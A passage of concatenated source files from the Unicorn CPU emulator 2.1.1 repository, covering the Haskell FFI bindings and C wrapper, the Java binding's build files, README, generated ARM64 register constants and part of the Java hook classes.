mkContext :: ContextPtr -> IO Context mkContext ptr = liftM Context (newForeignPtr memFree ptr) ------------------------------------------------------------------------------- -- Emulator control ------------------------------------------------------------------------------- {# fun uc_open as ^ { `Architecture' , combineEnums `[Mode]' , alloca- `EnginePtr' peek* } -> `Error' #} {# fun uc_query as ^ { `Engine' , `QueryType' , alloca- `Int' castPtrAndPeek* } -> `Error' #} {# fun uc_emu_start as ^ { `Engine' , `Word64' , `Word64' , `Int' , `Int' } -> `Error' #} {# fun uc_emu_stop as ^ { `Engine' } -> `Error' #} ------------------------------------------------------------------------------- -- Register operations ------------------------------------------------------------------------------- {# fun uc_reg_write_wrapper as ucRegWrite `Reg r' => { `Engine' , enumToNum `r' , withIntegral* `Int64' } -> `Error' #} {# fun uc_reg_read_wrapper as ucRegRead `Reg r' => { `Engine' , enumToNum `r' , alloca- `Int64' castPtrAndPeek* } -> `Error' #} {# fun uc_reg_write_batch_wrapper as ucRegWriteBatch `Reg r' => { `Engine' , withEnums* `[r]' , integralListToArray* `[Int64]' , `Int' } -> `Error' #} {# fun uc_reg_read_batch_wrapper as ucRegReadBatch `Reg r' => { `Engine' , withEnums* `[r]' , castPtr `Ptr Int64' , `Int' } -> `Error' #} ------------------------------------------------------------------------------- -- Memory operations ------------------------------------------------------------------------------- {# fun uc_mem_write as ^ { `Engine' , `Word64' , withByteStringLen* `ByteString'& } -> `Error' #} {# fun uc_mem_read as ^ { `Engine' , `Word64' , castPtr `Ptr Word8' , `Int' } -> `Error' #} {# fun uc_mem_map as ^ { `Engine' , `Word64' , `Int' , combineEnums `[MemoryPermission]' } -> `Error' #} {# fun uc_mem_unmap as ^ { `Engine' , `Word64' , `Int' } -> `Error' #} {# fun uc_mem_protect as ^ { `Engine' , `Word64' , `Int' , combineEnums `[MemoryPermission]' } -> `Error' #} {# fun uc_mem_regions as ^ { `Engine' , alloca- `MemoryRegionPtr' peek* , alloca- `Int' castPtrAndPeek* } -> `Error' #} ------------------------------------------------------------------------------- -- Context ------------------------------------------------------------------------------- {# fun uc_context_alloc as ^ { `Engine' , alloca- `ContextPtr' peek* } -> `Error' #} {# fun uc_context_save as ^ { `Engine' , `Context' } -> `Error' #} {# fun uc_context_restore as ^ { `Engine' , `Context' } -> `Error' #} ------------------------------------------------------------------------------- -- Misc. ------------------------------------------------------------------------------- {# fun pure unsafe uc_version as ^ { id `Ptr CUInt' , id `Ptr CUInt' } -> `Int' #} {# fun unsafe uc_errno as ^ { `Engine' } -> `Error' #} {# fun pure unsafe uc_strerror as ^ { `Error' } -> `String' #} ------------------------------------------------------------------------------- -- Helper functions ------------------------------------------------------------------------------- expandMemPerms :: (Integral a, Bits a) => a -> [MemoryPermission] expandMemPerms perms = -- Only interested in the 3 least-significant bits let maskedPerms = fromIntegral $ perms .&. 0x7 in if maskedPerms == 0x0 then [ProtNone] else if maskedPerms == 0x7 then [ProtAll] else checkRWE maskedPerms [ProtRead, ProtWrite, ProtExec] where checkRWE p (x:xs) = if p .&. 
(fromEnum x) /= 0 then x : checkRWE p xs else checkRWE p xs checkRWE _ [] = [] withIntegral :: (Integral a, Num b, Storable b) => a -> (Ptr b -> IO c) -> IO c withIntegral = with . fromIntegral withByteStringLen :: Integral a => ByteString -> ((Ptr (), a) -> IO b) -> IO b withByteStringLen bs f = useAsCStringLen bs $ \(ptr, len) -> f (castPtr ptr, fromIntegral len) withEnums :: Enum a => [a] -> (Ptr b -> IO c) -> IO c withEnums l f = let ints :: [CInt] = map enumToNum l in withArray ints $ \ptr -> f (castPtr ptr) integralListToArray :: (Integral a, Storable b, Num b) => [a] -> (Ptr b -> IO c) -> IO c integralListToArray l f = let l' = map fromIntegral l in withArray l' $ \array -> f array unicorn-2.1.1/bindings/haskell/src/Unicorn/Internal/Util.hs000066400000000000000000000013161467524106700236560ustar00rootroot00000000000000{-| Module : Unicorn.Internal.Util Description : Utility (aka helper) functions for the Unicorn emulator. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 -} module Unicorn.Internal.Util where import Data.Bits import Foreign -- | Combine a list of Enums by performing a bitwise-OR. combineEnums :: (Enum a, Num b, Bits b) => [a] -> b combineEnums = foldr ((.|.) <$> enumToNum) 0 -- | Cast a pointer and then peek inside it. castPtrAndPeek :: Storable a => Ptr b -> IO a castPtrAndPeek = peek . castPtr -- | Convert an 'Enum' to a 'Num'. enumToNum :: (Enum a, Num b) => a -> b enumToNum = fromIntegral . fromEnum unicorn-2.1.1/bindings/haskell/src/cbits/000077500000000000000000000000001467524106700203175ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/src/cbits/unicorn_wrapper.c000066400000000000000000000021741467524106700237040ustar00rootroot00000000000000#include <stdlib.h> #include "unicorn_wrapper.h" void uc_close_wrapper(uc_engine *uc) { uc_close(uc); } void uc_close_dummy(uc_engine *uc) { } uc_err uc_reg_write_wrapper(uc_engine *uc, int regid, const int64_t *value) { return uc_reg_write(uc, regid, (const void*) value); } uc_err uc_reg_read_wrapper(uc_engine *uc, int regid, int64_t *value) { return uc_reg_read(uc, regid, (void*) value); } uc_err uc_reg_write_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count) { void **valsPtr = malloc(sizeof(void*) * count); int i; for (i = 0; i < count; ++i) { valsPtr[i] = (void*) &vals[i]; } uc_err ret = uc_reg_write_batch(uc, regs, (void *const*) valsPtr, count); free(valsPtr); return ret; } uc_err uc_reg_read_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count) { void **valsPtr = malloc(sizeof(void*) * count); int i; for (i = 0; i < count; ++i) { valsPtr[i] = (void*) &vals[i]; } uc_err ret = uc_reg_read_batch(uc, regs, valsPtr, count); free(valsPtr); return ret; } void uc_free_wrapper(void *mem) { uc_free(mem); } unicorn-2.1.1/bindings/haskell/src/include/000077500000000000000000000000001467524106700206365ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/src/include/unicorn_wrapper.h000066400000000000000000000014711467524106700242270ustar00rootroot00000000000000#ifndef UNICORN_WRAPPER_H #define UNICORN_WRAPPER_H #include <stdint.h> #include <unicorn/unicorn.h> /* * Wrap Unicorn's uc_close function and ignore the returned error code. */ void uc_close_wrapper(uc_engine *uc); /* * Doesn't actually do anything. */ void uc_close_dummy(uc_engine *uc); /* * Wrappers for register read/write functions that accept int64_t pointers.
*/ uc_err uc_reg_write_wrapper(uc_engine *uc, int regid, const int64_t *value); uc_err uc_reg_read_wrapper(uc_engine *uc, int regid, int64_t *value); uc_err uc_reg_write_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count); uc_err uc_reg_read_batch_wrapper(uc_engine *uc, int *regs, int64_t *vals, int count); /* * Wrap Unicorn's uc_free function and ignore the returned error code. */ void uc_free_wrapper(void *context); #endif unicorn-2.1.1/bindings/haskell/unicorn.cabal000066400000000000000000000030261467524106700210660ustar00rootroot00000000000000-- Initial unicorn.cabal generated by cabal init. For further -- documentation, see http://haskell.org/cabal/users-guide/ name: unicorn version: 0.1.0.0 category: FFI, Emulation synopsis: Unicorn CPU emulator engine description: Haskell bindings for the Unicorn CPU emulator engine. homepage: https://github.com/unicorn-engine/unicorn author: Adrian Herrera license: GPL copyright: (c) 2016, Adrian Herrera category: System build-type: Simple stability: experimental cabal-version: >= 1.10 extra-source-files: cbits/ , include/ library exposed-modules: Unicorn.Internal.Core Unicorn.Internal.Unicorn Unicorn.CPU.Arm64 Unicorn.CPU.Arm Unicorn.CPU.M68k Unicorn.CPU.Mips Unicorn.CPU.Sparc Unicorn.CPU.X86 Unicorn.Internal.Hook Unicorn.Hook Unicorn other-modules: Unicorn.Internal.Util build-depends: base >=4 && <5 , bytestring >= 0.9.1 , transformers < 0.6 hs-source-dirs: src c-sources: src/cbits/unicorn_wrapper.c include-dirs: src/include build-tools: c2hs pkgconfig-depends: unicorn default-language: Haskell2010 ghc-options: -Wall unicorn-2.1.1/bindings/java/000077500000000000000000000000001467524106700157225ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/.gitignore000066400000000000000000000000101467524106700177010ustar00rootroot00000000000000target/ unicorn-2.1.1/bindings/java/CMakeLists.txt000066400000000000000000000013251467524106700204630ustar00rootroot00000000000000cmake_minimum_required(VERSION 3.1) find_package(JNI) if (JNI_FOUND) message (STATUS "JNI_INCLUDE_DIRS=${JNI_INCLUDE_DIRS}") message (STATUS "JNI_LIBRARIES=${JNI_LIBRARIES}") else() message(FATAL_ERROR "JNI not found, please try to update JAVA_HOME accordingly") endif() add_library(unicorn_java SHARED unicorn_Unicorn.c) message("${CMAKE_CURRENT_SOURCE_DIR}/bindings/java/target/headers") if (NOT EXISTS "${CMAKE_CURRENT_SOURCE_DIR}/target/headers") message(FATAL_ERROR "bindings/java/target/headers not generated, please generate them firstly") endif() target_include_directories(unicorn_java PRIVATE target/headers ${JNI_INCLUDE_DIRS}) target_link_libraries(unicorn_java PRIVATE unicorn ${JNI_LIBRARIES})unicorn-2.1.1/bindings/java/Makefile000066400000000000000000000022361467524106700173650ustar00rootroot00000000000000# Makefile for the native JNI library. Automatically called by Maven. 
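#
# Normally this is driven by `mvn package`; for a standalone build, a manual
# invocation might look like the following (the JDK path is only an example,
# adjust it for your system):
#
#   make JAVA_HOME=/usr/lib/jvm/java-8-openjdk-amd64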
JAVA_HOME ?= $(shell java -XshowSettings:properties -version 2>&1 | sed -n 's/ *java.home = //p') ifeq ($(JAVA_HOME),) $(error JAVA_HOME could not be determined; please set it manually (make JAVA_HOME=...)) endif JAVA_INC := $(JAVA_HOME)/include JAVA_PLATFORM_INC := $(shell dirname `find $(JAVA_INC) -name jni_md.h`) UNICORN_INC := ../../include OS := $(shell uname) ifeq ($(OS),Darwin) LIB_EXT=.dylib else ifeq ($(OS),Linux) LIB_EXT=.so else LIB_EXT=.dll endif all: libunicorn_java$(LIB_EXT) CC=gcc CFLAGS=-fPIC LDFLAGS=-shared -fPIC # May also use -lunicorn to dynamically link against the installed unicorn LIBS=../../build/libunicorn.a INCS=-I target/headers -I$(JAVA_INC) -I$(JAVA_PLATFORM_INC) -I$(UNICORN_INC) OBJS=unicorn_Unicorn.o unicorn_Unicorn.o: unicorn_Unicorn.c target/headers/unicorn_Unicorn.h $(CC) -O2 -Wall -Wextra -Wno-unused-parameter -c $(CFLAGS) $(INCS) $< -o $@ libunicorn_java$(LIB_EXT): $(OBJS) $(CC) -o $@ $(LDFLAGS) $(OBJS) $(LIBS) gen_const: cd .. && python3 const_generator.py java clean: rm -f libunicorn_java$(LIB_EXT) rm -f $(OBJS) .PHONY: all clean unicorn-2.1.1/bindings/java/README.md000066400000000000000000000030751467524106700172060ustar00rootroot00000000000000This documentation explains how to install the Java binding for Unicorn from source. 0. Follow `docs/COMPILE.md` in the root directory to compile the core to the `build` directory. Note: by default, the Java binding native library will be built by statically linking to `../../build/libunicorn.a`, thereby removing `libunicorn` as a runtime dependency, but making the produced native library `libunicorn_java` bigger. If you instead want to dynamically link against the installed `libunicorn`, change `LIBS=../../build/libunicorn.a` to `LIBS=-lunicorn` in `Makefile`. 1. Install a JDK for your platform. 2. Install Maven: https://maven.apache.org/install.html. 3. Change directories into the java bindings and build the Maven package: $ mvn package This will automatically build and test the Unicorn Java bindings. The bindings consist of the native JNI library (`libunicorn_java.{so,dylib,dll}`) and the Java JAR (`target/unicorn-2.xx.jar`). You will need to have the native library on `java.library.path` and the JAR on your classpath. The `src/main/test/java` directory contains some sample code to show how to use Unicorn API. `samples` is a set of sample classes showcasing the various features of the Unicorn API, while `tests` is a set of JUnit tests for the API. - `Sample_.java`: These show how to access architecture-specific information for each architecture. - `Shellcode.java`: This shows how to analyze a Linux shellcode. - `SampleNetworkAuditing.java`: Unicorn sample for auditing network connection and file handling in shellcode. unicorn-2.1.1/bindings/java/eclipse-formatter.xml000066400000000000000000001301731467524106700220760ustar00rootroot00000000000000 unicorn-2.1.1/bindings/java/pom.xml000066400000000000000000000055551467524106700172510ustar00rootroot00000000000000 4.0.0 org.unicorn-engine unicorn 2.1.1 unicorn https://www.unicorn-engine.org UTF-8 1.8 1.8 junit junit 4.13.2 test org.apache.maven.plugins maven-compiler-plugin 3.11.0 -h target/headers org.codehaus.mojo exec-maven-plugin 3.1.0 generate-consts generate-sources exec python3 const_generator.py java ${project.basedir}/.. 
compile-jni-lib compile exec make JAVA_HOME=${java.home} all clean-jni-lib clean exec make clean unicorn-2.1.1/bindings/java/src/000077500000000000000000000000001467524106700165115ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/main/000077500000000000000000000000001467524106700174355ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/main/java/000077500000000000000000000000001467524106700203565ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/main/java/unicorn/000077500000000000000000000000001467524106700220335ustar00rootroot00000000000000unicorn-2.1.1/bindings/java/src/main/java/unicorn/Arm64Const.java000066400000000000000000000403131467524106700245770ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface Arm64Const { // ARM64 CPU public static final int UC_CPU_ARM64_A57 = 0; public static final int UC_CPU_ARM64_A53 = 1; public static final int UC_CPU_ARM64_A72 = 2; public static final int UC_CPU_ARM64_MAX = 3; public static final int UC_CPU_ARM64_ENDING = 4; // ARM64 registers public static final int UC_ARM64_REG_INVALID = 0; public static final int UC_ARM64_REG_X29 = 1; public static final int UC_ARM64_REG_X30 = 2; public static final int UC_ARM64_REG_NZCV = 3; public static final int UC_ARM64_REG_SP = 4; public static final int UC_ARM64_REG_WSP = 5; public static final int UC_ARM64_REG_WZR = 6; public static final int UC_ARM64_REG_XZR = 7; public static final int UC_ARM64_REG_B0 = 8; public static final int UC_ARM64_REG_B1 = 9; public static final int UC_ARM64_REG_B2 = 10; public static final int UC_ARM64_REG_B3 = 11; public static final int UC_ARM64_REG_B4 = 12; public static final int UC_ARM64_REG_B5 = 13; public static final int UC_ARM64_REG_B6 = 14; public static final int UC_ARM64_REG_B7 = 15; public static final int UC_ARM64_REG_B8 = 16; public static final int UC_ARM64_REG_B9 = 17; public static final int UC_ARM64_REG_B10 = 18; public static final int UC_ARM64_REG_B11 = 19; public static final int UC_ARM64_REG_B12 = 20; public static final int UC_ARM64_REG_B13 = 21; public static final int UC_ARM64_REG_B14 = 22; public static final int UC_ARM64_REG_B15 = 23; public static final int UC_ARM64_REG_B16 = 24; public static final int UC_ARM64_REG_B17 = 25; public static final int UC_ARM64_REG_B18 = 26; public static final int UC_ARM64_REG_B19 = 27; public static final int UC_ARM64_REG_B20 = 28; public static final int UC_ARM64_REG_B21 = 29; public static final int UC_ARM64_REG_B22 = 30; public static final int UC_ARM64_REG_B23 = 31; public static final int UC_ARM64_REG_B24 = 32; public static final int UC_ARM64_REG_B25 = 33; public static final int UC_ARM64_REG_B26 = 34; public static final int UC_ARM64_REG_B27 = 35; public static final int UC_ARM64_REG_B28 = 36; public static final int UC_ARM64_REG_B29 = 37; public static final int UC_ARM64_REG_B30 = 38; public static final int UC_ARM64_REG_B31 = 39; public static final int UC_ARM64_REG_D0 = 40; public static final int UC_ARM64_REG_D1 = 41; public static final int UC_ARM64_REG_D2 = 42; public static final int UC_ARM64_REG_D3 = 43; public static final int UC_ARM64_REG_D4 = 44; public static final int UC_ARM64_REG_D5 = 45; public static final int UC_ARM64_REG_D6 = 46; public static final int UC_ARM64_REG_D7 = 47; public static final int UC_ARM64_REG_D8 = 48; public static final int UC_ARM64_REG_D9 = 49; public static final int UC_ARM64_REG_D10 = 50; public static final int UC_ARM64_REG_D11 = 51; public static final int UC_ARM64_REG_D12 = 
52; public static final int UC_ARM64_REG_D13 = 53; public static final int UC_ARM64_REG_D14 = 54; public static final int UC_ARM64_REG_D15 = 55; public static final int UC_ARM64_REG_D16 = 56; public static final int UC_ARM64_REG_D17 = 57; public static final int UC_ARM64_REG_D18 = 58; public static final int UC_ARM64_REG_D19 = 59; public static final int UC_ARM64_REG_D20 = 60; public static final int UC_ARM64_REG_D21 = 61; public static final int UC_ARM64_REG_D22 = 62; public static final int UC_ARM64_REG_D23 = 63; public static final int UC_ARM64_REG_D24 = 64; public static final int UC_ARM64_REG_D25 = 65; public static final int UC_ARM64_REG_D26 = 66; public static final int UC_ARM64_REG_D27 = 67; public static final int UC_ARM64_REG_D28 = 68; public static final int UC_ARM64_REG_D29 = 69; public static final int UC_ARM64_REG_D30 = 70; public static final int UC_ARM64_REG_D31 = 71; public static final int UC_ARM64_REG_H0 = 72; public static final int UC_ARM64_REG_H1 = 73; public static final int UC_ARM64_REG_H2 = 74; public static final int UC_ARM64_REG_H3 = 75; public static final int UC_ARM64_REG_H4 = 76; public static final int UC_ARM64_REG_H5 = 77; public static final int UC_ARM64_REG_H6 = 78; public static final int UC_ARM64_REG_H7 = 79; public static final int UC_ARM64_REG_H8 = 80; public static final int UC_ARM64_REG_H9 = 81; public static final int UC_ARM64_REG_H10 = 82; public static final int UC_ARM64_REG_H11 = 83; public static final int UC_ARM64_REG_H12 = 84; public static final int UC_ARM64_REG_H13 = 85; public static final int UC_ARM64_REG_H14 = 86; public static final int UC_ARM64_REG_H15 = 87; public static final int UC_ARM64_REG_H16 = 88; public static final int UC_ARM64_REG_H17 = 89; public static final int UC_ARM64_REG_H18 = 90; public static final int UC_ARM64_REG_H19 = 91; public static final int UC_ARM64_REG_H20 = 92; public static final int UC_ARM64_REG_H21 = 93; public static final int UC_ARM64_REG_H22 = 94; public static final int UC_ARM64_REG_H23 = 95; public static final int UC_ARM64_REG_H24 = 96; public static final int UC_ARM64_REG_H25 = 97; public static final int UC_ARM64_REG_H26 = 98; public static final int UC_ARM64_REG_H27 = 99; public static final int UC_ARM64_REG_H28 = 100; public static final int UC_ARM64_REG_H29 = 101; public static final int UC_ARM64_REG_H30 = 102; public static final int UC_ARM64_REG_H31 = 103; public static final int UC_ARM64_REG_Q0 = 104; public static final int UC_ARM64_REG_Q1 = 105; public static final int UC_ARM64_REG_Q2 = 106; public static final int UC_ARM64_REG_Q3 = 107; public static final int UC_ARM64_REG_Q4 = 108; public static final int UC_ARM64_REG_Q5 = 109; public static final int UC_ARM64_REG_Q6 = 110; public static final int UC_ARM64_REG_Q7 = 111; public static final int UC_ARM64_REG_Q8 = 112; public static final int UC_ARM64_REG_Q9 = 113; public static final int UC_ARM64_REG_Q10 = 114; public static final int UC_ARM64_REG_Q11 = 115; public static final int UC_ARM64_REG_Q12 = 116; public static final int UC_ARM64_REG_Q13 = 117; public static final int UC_ARM64_REG_Q14 = 118; public static final int UC_ARM64_REG_Q15 = 119; public static final int UC_ARM64_REG_Q16 = 120; public static final int UC_ARM64_REG_Q17 = 121; public static final int UC_ARM64_REG_Q18 = 122; public static final int UC_ARM64_REG_Q19 = 123; public static final int UC_ARM64_REG_Q20 = 124; public static final int UC_ARM64_REG_Q21 = 125; public static final int UC_ARM64_REG_Q22 = 126; public static final int UC_ARM64_REG_Q23 = 127; public static 
final int UC_ARM64_REG_Q24 = 128; public static final int UC_ARM64_REG_Q25 = 129; public static final int UC_ARM64_REG_Q26 = 130; public static final int UC_ARM64_REG_Q27 = 131; public static final int UC_ARM64_REG_Q28 = 132; public static final int UC_ARM64_REG_Q29 = 133; public static final int UC_ARM64_REG_Q30 = 134; public static final int UC_ARM64_REG_Q31 = 135; public static final int UC_ARM64_REG_S0 = 136; public static final int UC_ARM64_REG_S1 = 137; public static final int UC_ARM64_REG_S2 = 138; public static final int UC_ARM64_REG_S3 = 139; public static final int UC_ARM64_REG_S4 = 140; public static final int UC_ARM64_REG_S5 = 141; public static final int UC_ARM64_REG_S6 = 142; public static final int UC_ARM64_REG_S7 = 143; public static final int UC_ARM64_REG_S8 = 144; public static final int UC_ARM64_REG_S9 = 145; public static final int UC_ARM64_REG_S10 = 146; public static final int UC_ARM64_REG_S11 = 147; public static final int UC_ARM64_REG_S12 = 148; public static final int UC_ARM64_REG_S13 = 149; public static final int UC_ARM64_REG_S14 = 150; public static final int UC_ARM64_REG_S15 = 151; public static final int UC_ARM64_REG_S16 = 152; public static final int UC_ARM64_REG_S17 = 153; public static final int UC_ARM64_REG_S18 = 154; public static final int UC_ARM64_REG_S19 = 155; public static final int UC_ARM64_REG_S20 = 156; public static final int UC_ARM64_REG_S21 = 157; public static final int UC_ARM64_REG_S22 = 158; public static final int UC_ARM64_REG_S23 = 159; public static final int UC_ARM64_REG_S24 = 160; public static final int UC_ARM64_REG_S25 = 161; public static final int UC_ARM64_REG_S26 = 162; public static final int UC_ARM64_REG_S27 = 163; public static final int UC_ARM64_REG_S28 = 164; public static final int UC_ARM64_REG_S29 = 165; public static final int UC_ARM64_REG_S30 = 166; public static final int UC_ARM64_REG_S31 = 167; public static final int UC_ARM64_REG_W0 = 168; public static final int UC_ARM64_REG_W1 = 169; public static final int UC_ARM64_REG_W2 = 170; public static final int UC_ARM64_REG_W3 = 171; public static final int UC_ARM64_REG_W4 = 172; public static final int UC_ARM64_REG_W5 = 173; public static final int UC_ARM64_REG_W6 = 174; public static final int UC_ARM64_REG_W7 = 175; public static final int UC_ARM64_REG_W8 = 176; public static final int UC_ARM64_REG_W9 = 177; public static final int UC_ARM64_REG_W10 = 178; public static final int UC_ARM64_REG_W11 = 179; public static final int UC_ARM64_REG_W12 = 180; public static final int UC_ARM64_REG_W13 = 181; public static final int UC_ARM64_REG_W14 = 182; public static final int UC_ARM64_REG_W15 = 183; public static final int UC_ARM64_REG_W16 = 184; public static final int UC_ARM64_REG_W17 = 185; public static final int UC_ARM64_REG_W18 = 186; public static final int UC_ARM64_REG_W19 = 187; public static final int UC_ARM64_REG_W20 = 188; public static final int UC_ARM64_REG_W21 = 189; public static final int UC_ARM64_REG_W22 = 190; public static final int UC_ARM64_REG_W23 = 191; public static final int UC_ARM64_REG_W24 = 192; public static final int UC_ARM64_REG_W25 = 193; public static final int UC_ARM64_REG_W26 = 194; public static final int UC_ARM64_REG_W27 = 195; public static final int UC_ARM64_REG_W28 = 196; public static final int UC_ARM64_REG_W29 = 197; public static final int UC_ARM64_REG_W30 = 198; public static final int UC_ARM64_REG_X0 = 199; public static final int UC_ARM64_REG_X1 = 200; public static final int UC_ARM64_REG_X2 = 201; public static final int UC_ARM64_REG_X3 
= 202; public static final int UC_ARM64_REG_X4 = 203; public static final int UC_ARM64_REG_X5 = 204; public static final int UC_ARM64_REG_X6 = 205; public static final int UC_ARM64_REG_X7 = 206; public static final int UC_ARM64_REG_X8 = 207; public static final int UC_ARM64_REG_X9 = 208; public static final int UC_ARM64_REG_X10 = 209; public static final int UC_ARM64_REG_X11 = 210; public static final int UC_ARM64_REG_X12 = 211; public static final int UC_ARM64_REG_X13 = 212; public static final int UC_ARM64_REG_X14 = 213; public static final int UC_ARM64_REG_X15 = 214; public static final int UC_ARM64_REG_X16 = 215; public static final int UC_ARM64_REG_X17 = 216; public static final int UC_ARM64_REG_X18 = 217; public static final int UC_ARM64_REG_X19 = 218; public static final int UC_ARM64_REG_X20 = 219; public static final int UC_ARM64_REG_X21 = 220; public static final int UC_ARM64_REG_X22 = 221; public static final int UC_ARM64_REG_X23 = 222; public static final int UC_ARM64_REG_X24 = 223; public static final int UC_ARM64_REG_X25 = 224; public static final int UC_ARM64_REG_X26 = 225; public static final int UC_ARM64_REG_X27 = 226; public static final int UC_ARM64_REG_X28 = 227; public static final int UC_ARM64_REG_V0 = 228; public static final int UC_ARM64_REG_V1 = 229; public static final int UC_ARM64_REG_V2 = 230; public static final int UC_ARM64_REG_V3 = 231; public static final int UC_ARM64_REG_V4 = 232; public static final int UC_ARM64_REG_V5 = 233; public static final int UC_ARM64_REG_V6 = 234; public static final int UC_ARM64_REG_V7 = 235; public static final int UC_ARM64_REG_V8 = 236; public static final int UC_ARM64_REG_V9 = 237; public static final int UC_ARM64_REG_V10 = 238; public static final int UC_ARM64_REG_V11 = 239; public static final int UC_ARM64_REG_V12 = 240; public static final int UC_ARM64_REG_V13 = 241; public static final int UC_ARM64_REG_V14 = 242; public static final int UC_ARM64_REG_V15 = 243; public static final int UC_ARM64_REG_V16 = 244; public static final int UC_ARM64_REG_V17 = 245; public static final int UC_ARM64_REG_V18 = 246; public static final int UC_ARM64_REG_V19 = 247; public static final int UC_ARM64_REG_V20 = 248; public static final int UC_ARM64_REG_V21 = 249; public static final int UC_ARM64_REG_V22 = 250; public static final int UC_ARM64_REG_V23 = 251; public static final int UC_ARM64_REG_V24 = 252; public static final int UC_ARM64_REG_V25 = 253; public static final int UC_ARM64_REG_V26 = 254; public static final int UC_ARM64_REG_V27 = 255; public static final int UC_ARM64_REG_V28 = 256; public static final int UC_ARM64_REG_V29 = 257; public static final int UC_ARM64_REG_V30 = 258; public static final int UC_ARM64_REG_V31 = 259; // pseudo registers public static final int UC_ARM64_REG_PC = 260; public static final int UC_ARM64_REG_CPACR_EL1 = 261; // thread registers, deprecated, use UC_ARM64_REG_CP_REG instead public static final int UC_ARM64_REG_TPIDR_EL0 = 262; public static final int UC_ARM64_REG_TPIDRRO_EL0 = 263; public static final int UC_ARM64_REG_TPIDR_EL1 = 264; public static final int UC_ARM64_REG_PSTATE = 265; // exception link registers, deprecated, use UC_ARM64_REG_CP_REG instead public static final int UC_ARM64_REG_ELR_EL0 = 266; public static final int UC_ARM64_REG_ELR_EL1 = 267; public static final int UC_ARM64_REG_ELR_EL2 = 268; public static final int UC_ARM64_REG_ELR_EL3 = 269; // stack pointer registers, deprecated, use UC_ARM64_REG_CP_REG instead public static final int UC_ARM64_REG_SP_EL0 = 270; public static
final int UC_ARM64_REG_SP_EL1 = 271; public static final int UC_ARM64_REG_SP_EL2 = 272; public static final int UC_ARM64_REG_SP_EL3 = 273; // other CP15 registers, deprecated, use UC_ARM64_REG_CP_REG instead public static final int UC_ARM64_REG_TTBR0_EL1 = 274; public static final int UC_ARM64_REG_TTBR1_EL1 = 275; public static final int UC_ARM64_REG_ESR_EL0 = 276; public static final int UC_ARM64_REG_ESR_EL1 = 277; public static final int UC_ARM64_REG_ESR_EL2 = 278; public static final int UC_ARM64_REG_ESR_EL3 = 279; public static final int UC_ARM64_REG_FAR_EL0 = 280; public static final int UC_ARM64_REG_FAR_EL1 = 281; public static final int UC_ARM64_REG_FAR_EL2 = 282; public static final int UC_ARM64_REG_FAR_EL3 = 283; public static final int UC_ARM64_REG_PAR_EL1 = 284; public static final int UC_ARM64_REG_MAIR_EL1 = 285; public static final int UC_ARM64_REG_VBAR_EL0 = 286; public static final int UC_ARM64_REG_VBAR_EL1 = 287; public static final int UC_ARM64_REG_VBAR_EL2 = 288; public static final int UC_ARM64_REG_VBAR_EL3 = 289; public static final int UC_ARM64_REG_CP_REG = 290; // floating point control and status registers public static final int UC_ARM64_REG_FPCR = 291; public static final int UC_ARM64_REG_FPSR = 292; public static final int UC_ARM64_REG_ENDING = 293; // alias registers public static final int UC_ARM64_REG_IP0 = 215; public static final int UC_ARM64_REG_IP1 = 216; public static final int UC_ARM64_REG_FP = 1; public static final int UC_ARM64_REG_LR = 2; // ARM64 instructions public static final int UC_ARM64_INS_INVALID = 0; public static final int UC_ARM64_INS_MRS = 1; public static final int UC_ARM64_INS_MSR = 2; public static final int UC_ARM64_INS_SYS = 3; public static final int UC_ARM64_INS_SYSL = 4; public static final int UC_ARM64_INS_ENDING = 5; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/Arm64SysHook.java000066400000000000000000000030611467524106700251070ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_INSN} with {@code UC_ARM64_INS_MRS}, * {@code UC_ARM64_INS_MSR}, {@code UC_ARM64_INS_SYS} * or {@code UC_ARM64_INS_SYSL} */ public interface Arm64SysHook extends InstructionHook { /** Called to handle an AArch64 MRS, MSR, SYS or SYSL instruction.
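* <p>A minimal usage sketch (illustrative only: it assumes an existing
* AArch64 {@code Unicorn} instance {@code uc} and an insn-specific
* {@code hook_add(Arm64SysHook, int insn, long begin, long end, Object user)}
* overload; passing begin &gt; end hooks all addresses):
* <pre>{@code
* uc.hook_add((Arm64SysHook) (engine, reg, cp_reg, user) -> {
*     // Pretend every hooked MRS reads back 0, then skip the instruction.
*     engine.reg_write(reg, 0L);
*     return 1;
* }, Arm64Const.UC_ARM64_INS_MRS, 1, 0, null);
* }</pre>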
* * @param u {@link Unicorn} instance firing this hook * @param reg source or destination register * ({@code UC_ARM64_REG_X*} constant) * @param cp_reg coprocessor register specification * ({@code .val} = current value of {@code reg}) * @param user user data provided when registering this hook * @return 1 to skip the instruction (marking it as handled), * 0 to let QEMU handle it */ public int hook(Unicorn u, int reg, Arm64_CP cp_reg, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/Arm64_CP.java000066400000000000000000000026161467524106700241560ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** ARM64 coprocessor registers for instructions MRS, MSR, SYS, 